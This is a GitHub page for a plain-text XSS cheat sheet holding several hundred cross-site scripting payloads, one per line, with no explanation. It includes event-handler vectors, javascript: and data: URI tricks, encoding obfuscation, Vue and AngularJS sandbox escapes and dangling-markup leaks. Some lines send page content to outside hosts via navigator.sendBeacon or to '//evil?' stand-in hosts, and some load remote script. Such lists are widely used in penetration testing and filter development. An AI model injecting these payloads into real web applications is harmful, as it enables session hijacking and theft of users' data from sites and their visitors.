-
Notifications
You must be signed in to change notification settings - Fork 0
/
XSS-2020-Cheat-Sheet.txt
389 lines (389 loc) · 30.1 KB
/
XSS-2020-Cheat-Sheet.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<body onafterprint=alert(1)>
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss>
<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus>
<body onbeforeprint=alert(1)>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input id=y autofocus>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<audio src/onerror=alert(1)>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<a id=x tabindex=1 onfocus=alert(1)></a>
<a id=x tabindex=1 onfocusin=alert(1)></a>
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
<body onhashchange="alert(1)">
<body onload=alert(1)>
<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
<image src=validimage.png onloadend=alert(1)>
<image src=validimage.png onloadstart=alert(1)>
<body onmessage=alert(1)>
<body onpageshow=alert(1)>
<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<body onpopstate=alert(1)>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<applet onreadystatechange=alert(1)></applet>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<body onresize="alert(1)">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<marquee onstart=alert(1)>XSS</marquee>
<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<details ontoggle=alert(1) open>test</details>
<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
<body onunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
<input onauxclick=alert(1)>
<a onbeforecopy="alert(1)" contenteditable>test</a>
<a onbeforecut="alert(1)" contenteditable>test</a>
<a onbeforepaste="alert(1)" contenteditable>test</a>
<input onchange=alert(1) value=xss>
<xss onclick="alert(1)">test</xss>
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<xss oncontextmenu="alert(1)">test</xss>
<xss oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<xss oncut=alert(1) value="XSS" autofocus tabindex=1>test
<xss ondblclick="alert(1)" autofocus tabindex=1>test</xss>
<xss draggable="true" ondrag="alert(1)">test</xss>
<xss draggable="true" ondragend="alert(1)">test</xss>
<xss draggable="true" ondragenter="alert(1)">test</xss>
<xss draggable="true" ondragleave="alert(1)">test</xss>
<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
<xss draggable="true" ondragstart="alert(1)">test</xss>
<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
<input oninput=alert(1) value=xss>
<form><input oninvalid=alert(1) required><input type=submit>
<xss onkeydown="alert(1)" contenteditable>test</xss>
<xss onkeypress="alert(1)" contenteditable>test</xss>
<xss onkeyup="alert(1)" contenteditable>test</xss>
<xss onmousedown="alert(1)">test</xss>
<xss onmouseenter="alert(1)">test</xss>
<xss onmouseleave="alert(1)">test</xss>
<xss onmousemove="alert(1)">test</xss>
<xss onmouseout="alert(1)">test</xss>
<xss onmouseover="alert(1)">test</xss>
<xss onmouseup="alert(1)">test</xss>
<xss onmousewheel=alert(1)>requires scrolling
<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
<body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<a onpaste="alert(1)" contenteditable>test</a>
<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<xss onpointerdown=alert(1)>XSS</xss>
<xss onpointerenter=alert(1)>XSS</xss>
<xss onpointerleave=alert(1)>XSS</xss>
<xss onpointermove=alert(1)>XSS</xss>
<xss onpointerout=alert(1)>XSS</xss>
<xss onpointerover=alert(1)>XSS</xss>
<xss onpointerrawupdate=alert(1)>XSS</xss>
<xss onpointerup=alert(1)>XSS</xss>
<form onreset=alert(1)><input type=reset>
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<input onselect=alert(1) value="XSS" autofocus>
<body onselectionchange=alert(1)>select some text
<body onselectstart=alert(1)>select some text
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
<form onsubmit=alert(1)><input type=submit>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<body ontouchstart=alert(1)>
<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<body onwheel=alert(1)>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
<script>Function`X${document.location.hash.substr`1`}```</script>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<a href="javascript:alert(1)">XSS</a>
<a href="JaVaScript:alert(1)">XSS</a>
<a href=" javascript:alert(1)">XSS</a>
<a href="javas cript:alert(1)">XSS</a>
<a href="javascript :alert(1)">XSS</a>
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
<script src="data:text/javascript,alert(1)"></script>
<svg><script href="data:text/javascript,alert(1)" />
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
<script>import('data:text/javascript,alert(1)')</script>
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
<math><x href="javascript:alert(1)">blah
<form><button formaction=javascript:alert(1)>XSS
<form><input type=submit formaction=javascript:alert(1) value=XSS>
<form action=javascript:alert(1)><input type=submit value=XSS>
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?;javascript:alert(1);0" /><a id=xss><text x=20 y=20>XSS</text></a>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<a href=# download="filename.html">Test</a>
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
<a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<iframe sandbox src="//portswigger-labs.net"></iframe>
<meta name="referrer" content="no-referrer">
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<script>eval('\141lert(1)')</script>
<script>eval('alert(\061)')</script>
<script>eval('alert(\61)')</script>
<a href="javascript:alert(1)">XSS</a><a href="javascript:alert(1)">XSS</a>
<svg><script>alert(1)</script></svg> <svg><script>alert(1)</script></svg> <svg><script>alert
(1)</script></svg> <svg><script>x="",alert(1)//";</script></svg>
<a href="javascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a> <a href="j avascript:alert(1)">XSS</a> <a href="j avascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a> <a href="java	script:alert(1)">XSS</a> <a href="java
script:alert(1)">XSS</a> <a href="javascript:alert(1)">XSS</a>
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
<iframe srcdoc=<script>alert(1)</script>></iframe>
<iframe src="javascript:'%3Cscript%3Ealert(1)%3C%2Fscript%3E'"></iframe>
<svg><script>\u0061\u006c\u0065\u0072\u0074(1)</script></svg>
{{constructor.constructor('alert(1)')()}}
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
<x v-html=_c.constructor('alert(1)')()>
<x v-if=_c.constructor('alert(1)')()>
{{_c.constructor('alert(1)')()}}
{{_v.constructor('alert(1)')()}}
{{_s.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<x @[_b.constructor`alert(1)`()]>
<x :[_b.constructor`alert(1)`()]>
<p v-=_c.constructor`alert(1)`()>
<x #[_c.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
{{_c.constructor('alert(1)')()}}
{{_b.constructor`alert(1)`()}}
<x v-bind:is="'script'" src="//14.rs" />
<x is=script src=//?.?>
<x @click='_b.constructor`alert(1)`()'>click</x>
<x @[_b.constructor`alert(1)`()]>
<x :[_b.constructor`alert(1)`()]>
<x #[_c.constructor`alert(1)`()]>
<x title"="<iframe	onload	=alert(1)>">
<x title"="<iframe	onload	=setTimeout(/alert(1)/.source)>">
<xyz<img/src onerror=alert(1)>>
<svg><svg><b><noscript></noscript><iframe	onload=setTimeout(/alert(1)/.source)></noscript></b></svg>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
{{$el.ownerDocument.defaultView.alert(1)}}
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
<img src @error=e=$event.path.pop().alert(1)>
<img src @error=e=$event.composedPath().pop().alert(1)>
<img src @error=this.alert(1)>
<svg@load=this.alert(1)>
{{_openBlock.constructor('alert(1)')()}}
{{_createBlock.constructor('alert(1)')()}}
{{_toDisplayString.constructor('alert(1)')()}}
{{_createVNode.constructor('alert(1)')()}}
<p v-show=_createBlock.constructor`alert(1)`()>
<x @[_openBlock.constructor`alert(1)`()]>
<x @[_capitalize.constructor`alert(1)`()]>
<x @click=_withCtx.constructor`alert(1)`()>click</x>
<x @click=$event.view.alert(1)>click</x>
{{_Vue.h.constructor`alert(1)`()}}
{{$emit.constructor`alert(1)`()}}
<teleport to=script:nth-child(2)>alert(1)</teleport></div><script></script>
<teleport to=script:nth-child(2)>alert(1)</teleport></div><script></script>
<component is=script text=alert(1)>
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{{}.")));alert(1)//"}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{{}.")));alert(1)//"}}
{{{}.")));alert(1)//"}}
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
{{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
constructor.constructor('alert(1)')()
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
{}.")));alert(1)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
constructor.constructor('alert(1)')()
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
<body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
<link rel=stylesheet href="//evil?
<link rel=icon href="//evil?
<meta http-equiv="refresh" content="0; http://evil?
<img src="//evil? <image src="//evil?
<video><track default src="//evil?
<video><source src="//evil?
<audio><source src="//evil?
<input type=image src="//evil?
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
<object data="//evil?
<iframe src="//evil?
<embed src="//evil?
<form><button formaction=//evil>XSS</button><textarea name=x>
<button form=x>XSS</button><form id=x action=//evil target='
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<input type=hidden type=image src="//evil?
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//
';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//
';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//
';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//
';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//
';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//
';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//
';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//
';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//
';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
';window['\141\154\145\162\164']('\130\123\123');//
';self['\141\154\145\162\164']('\130\123\123');//
';this['\141\154\145\162\164']('\130\123\123');//
';top['\141\154\145\162\164']('\130\123\123');//
';parent['\141\154\145\162\164']('\130\123\123');//
';frames['\141\154\145\162\164']('\130\123\123');//
';globalThis['\141\154\145\162\164']('\130\123\123');//
';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';window[/al/.source+/ert/.source](/XSS/.source);//
';self[/al/.source+/ert/.source](/XSS/.source);//
';this[/al/.source+/ert/.source](/XSS/.source);//
';top[/al/.source+/ert/.source](/XSS/.source);//
';parent[/al/.source+/ert/.source](/XSS/.source);//
';frames[/al/.source+/ert/.source](/XSS/.source);//
';globalThis[/al/.source+/ert/.source](/XSS/.source);//
';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
<img src="javascript:alert(1)">
<body background="javascript:alert(1)">
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
